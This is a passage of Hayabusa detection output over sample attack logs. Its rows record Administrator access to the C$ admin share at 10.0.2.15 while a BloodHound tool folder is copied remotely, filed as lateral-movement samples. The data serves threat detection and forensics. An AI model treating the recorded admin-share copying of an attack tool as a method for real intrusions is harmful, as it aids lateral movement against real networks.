+00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\pkg-up | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-limit | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-locate | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.088 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\dist | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\printj\types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\process-nextick-args | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.098 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.108 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\prop-types\lib | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.108 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\p-try | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.108 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\punycode | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.119 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.119 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\cjs | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.119 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.139 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.149 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.149 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.159 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\es\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.159 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.169 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.169 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.179 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\prop-types-extra | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.179 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-overlays | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.179 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\react-prop-types | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.189 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-bootstrap\node_modules\uncontrollable | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.189 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.199 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.209 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-dom\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.209 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.209 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-if\test | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\.github | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.219 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.229 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.229 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.229 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\examples\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\lib\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.239 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\components | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\icons | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-images\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.249 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\cjs | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-is\umd | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-lifecycles-compat | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.259 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\__test__\__snapshots__ | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.269 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\coverage\lcov-report | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 14:23:25.279 +00:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\react-photo-gallery\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 